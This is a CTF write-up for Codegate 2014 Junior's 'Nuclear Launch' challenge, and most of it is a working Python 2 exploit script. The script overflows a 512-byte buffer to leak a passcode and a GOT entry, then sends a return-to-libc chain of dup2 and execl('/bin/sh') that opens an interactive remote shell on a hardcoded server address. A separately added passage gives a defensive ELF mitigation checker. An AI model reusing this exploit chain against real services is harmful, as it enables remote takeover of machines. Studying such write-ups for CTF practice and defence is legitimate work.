
[Codegate 2014 Junior CTF] Nuclear Launch

Category: WarGame
2014. 2. 12. 16:00

Hmm.. first of all there is this PASSCODE thing... I think I can get it by overwriting buf so the \x00 is gone and then grabbing the value that gets printed.


IF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE

COUNT DOWN : 99

SEND SHELL

ls
examples.desktop
key
nuclear
THIS_IS_NOT_KEY_JUST_PASSCODE

cat key
BUG_BOUNTIES_b3COM3_GrEAT

cat THI*
in the end, i was there.




It is a basic buffer overflow, but with ASLR + DEP.

Because the service uses fork, every child inherits the parent's address space layout. So as long as we can read memory contents once, the addresses stay fixed across connections, and ASLR can be bypassed.

DEP is bypassed with RTL (return-to-libc).

We force a read of the value written in the GOT through the recv function, check where that function is mapped,

and from that value compute the locations of execl, "/bin/sh" and dup2.

Then we exploit with that..........

The target system is Ubuntu 13.10 32-bit.
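The attack above works because the service binary keeps fixed 0x0804xxxx addresses (non-PIE) while fork() hands every child the same layout, so one GOT leak serves every later connection. A defender auditing such a service would check those properties from the ELF headers. The following is an added example, not code from the original post or from the challenge: a stdlib-only Python 3 checker for PIE, NX (DEP) and RELRO in a little-endian ELF32 image like the 32-bit Ubuntu target, with a constructed minimal ELF builder so it can be exercised offline. The constants come from the ELF specification; build_sample_elf and check_mitigations are names chosen here.

```python
import struct

# ELF32 constants from the ELF specification (elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 8, 1


def check_mitigations(elf):
    """Report PIE / NX / RELRO for a little-endian ELF32 image given as bytes.

    pie  : True when e_type is ET_DYN. A non-PIE ET_EXEC binary keeps fixed
           0x0804xxxx addresses even with system ASLR on, which is why the
           hard-coded PLT/GOT addresses in the post's script could be reused.
    nx   : True when PT_GNU_STACK lacks PF_X (stack not executable, DEP);
           None if the header is absent and the loader default applies.
    relro: "none", "partial" (PT_GNU_RELRO only) or "full" (plus BIND_NOW,
           which makes the GOT read-only after relocation).
    """
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if elf[4] != 1 or elf[5] != 1:
        raise ValueError("only ELFCLASS32 little-endian images are handled")
    e_type = struct.unpack_from("<H", elf, 16)[0]
    e_phoff = struct.unpack_from("<I", elf, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)

    nx, have_relro_seg, bind_now = None, False, False
    for i in range(e_phnum):
        (p_type, p_offset, _vaddr, _paddr, p_filesz,
         _memsz, p_flags, _align) = struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            have_relro_seg = True
        elif p_type == PT_DYNAMIC:
            # Walk Elf32_Dyn entries (signed tag, unsigned value) up to DT_NULL
            for off in range(p_offset, p_offset + p_filesz, 8):
                d_tag, d_val = struct.unpack_from("<iI", elf, off)
                if d_tag == DT_NULL:
                    break
                if d_tag == DT_BIND_NOW:
                    bind_now = True
                elif d_tag == DT_FLAGS and d_val & DF_BIND_NOW:
                    bind_now = True
                elif d_tag == DT_FLAGS_1 and d_val & DF_1_NOW:
                    bind_now = True
    if not have_relro_seg:
        relro = "none"
    elif bind_now:
        relro = "full"
    else:
        relro = "partial"
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_sample_elf(pie=False, nx=True, relro="none"):
    """Construct a minimal, non-runnable ELF32 image carrying only the headers
    check_mitigations inspects (constructed test input, not a real binary)."""
    phdrs = [
        # PT_GNU_STACK: a PF_X flag here means an executable stack (no DEP)
        (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | (0 if nx else PF_X), 16),
    ]
    if relro != "none":
        # constructed segment address; only the header type matters for the check
        phdrs.append((PT_GNU_RELRO, 0, 0x08049000, 0x08049000, 0x1000, 0x1000, PF_R, 1))
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW if relro == "full" else 0)
    dyn += struct.pack("<iI", DT_NULL, 0)
    phnum = len(phdrs) + 1                 # +1 for PT_DYNAMIC
    dyn_off = 52 + 32 * phnum              # dynamic entries follow the phdr table
    phdrs.append((PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), PF_R | PF_W, 4))

    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8    # class32, LE, v1, SysV ABI
    header = ident + struct.pack("<HHIIIIIHHHHHH",
                                 ET_DYN if pie else ET_EXEC, 3, 1, 0,  # type, EM_386, version, entry
                                 52, 0, 0, 52, 32, phnum, 0, 0, 0)     # phoff, shoff, flags, sizes
    table = b"".join(struct.pack("<8I", *p) for p in phdrs)
    return header + table + dyn


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(check_mitigations(image))
```

Run it with a path to a 32-bit binary to see its flags; with no argument it reports on the constructed sample. A result of pie=False is the condition that lets a single leaked GOT value be reused against every forked child, and relro="full" is what would have stopped the GOT from being overwritten (though not read).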





#!/usr/bin/python
# Python 2 exploit script; the libc offsets below are for the Ubuntu 13.10 32-bit target.

import socket
import telnetlib
import binascii
import time
import struct


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('58.229.183.22', 1129))

data = s.recv(1024)
print "READ : ",data

# Walk the menu: set a target coordinate first.
#print "SEND", buffer
s.send("target"+ "\n")
time.sleep(0.5)
print s.recv(1024)
print "----------------------------------------------"
s.send("1111638656.000000/1111638656.000000"+ "\n")
print s.recv(1024)
# Earlier probe (commented out): a 612-byte command, with the server's response
# captured below it. The overflow pushes the stored PASSCODE out past the NUL.
'''
print "----------------------------------------------"
s.send("A"*612+"\n")
print s.recv(1024)
print "----------------------------------------------"

:: Welcome to the Nuclear Control System ::


> 
----------------------------------------------
[+] Enter coordinate of target, (Latitude/Longitude)
---> 
----------------------------------------------
[+] Target coordinate setting completed.
> 
----------------------------------------------
[!] Unknown command : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


N


Nin the end, i was there.
'''

# Pack a 32-bit little-endian address.
p = lambda x : struct.pack("<L" , x)

# Launch, then answer the cancel-code prompt with the leaked PASSCODE.
s.send("launch\n")
time.sleep(0.5)
print s.recv(1024)
print "----------------------------------------------"
s.send("in the end, i was there."+"\n")
print s.recv(1024)
print "----------------------------------------------"
print s.recv(1024)
print "----------------------------------------------"

print s.recv(1024)
print s.recv(1024)
print "SEND SHELL"

# Offsets for another libc build (kept by the author, unused here).
# x64.
'''
setsockopt = socket.ntohl(0xc08a6ab7)
system_func = p(setsockopt+805392)
execl_func = p(setsockopt-228912)
binsh_str = p(setsockopt+0x6D60C)
dup2_func = p(setsockopt-69808)
poppopret = p(0x804917e)
'''

# x32
# setsockopt: the libc address read out of the GOT in step 1, byte-swapped
# because it arrived as raw bytes. Because the server forks, the same libc
# base is valid for every new connection, so the other symbols are reached
# as fixed offsets from it.
setsockopt = socket.ntohl(0xc08a6ab7)
execl_func = p(setsockopt-232576)
binsh_str = p(setsockopt+0x760d8)
dup2_func = p(setsockopt-75984)
poppopret = p(0x804917e)   # pop; pop; ret gadget in the (non-PIE) binary


#step1.
# Leak (commented out once the value above was captured): overflow the
# 512-byte buffer, keep the overwritten local at 2, pad to the saved return
# address, then return into the function at 0x08048900 with the arguments
# (4, 0x0804b00c, 4, 0), which sends the 4-byte GOT entry at 0x0804b00c back
# over the socket (fd 4). The hexlified reply is the leaked address.
"""
s.send("A"*512 + "\x02\x00\x00\x00" + "BBBB"*3 + "\x00\x89\x04\x08" + "BBBB" + "\x04\x00\x00\x00" + "\x0c\xb0\x04\x08" + "\x04\x00\x00\x00"+"\x00\x00\x00\x00"*2 + "CCCC")
time.sleep(0.5)
for i in range(10) :
	print "-x-x-x-x-x-"
	d = s.recv(1024)
	print binascii.hexlify(d)
	print "--t-t-t-t-t-"
print s.recv(1024)
print s.recv(1024)

#data = s.recv(1024)
#print "READ : ",data
"""

#step2.
# Return-to-libc chain, chained with pop-pop-ret so each call's two arguments
# are removed before the next return:
#   dup2(4, 0); dup2(4, 1)            -> socket becomes stdin/stdout
#   execl("/bin/sh", "/bin/sh", NULL) -> shell on the socket
s.send("A"*512 + "\x02\x00\x00\x00" + "BBBB"*3 + dup2_func + poppopret + "\x04\x00\x00\x00" + "\x00\x00\x00\x00" + dup2_func + poppopret + "\x04\x00\x00\x00" + "\x01\x00\x00\x00" + execl_func + "BBBB" + binsh_str +binsh_str + "\x00\x00\x00\x00"*4)


# Hand the connected socket to telnetlib for an interactive session.
t = telnetlib.Telnet()
t.sock= s
t.interact()

t.close()
s.close()

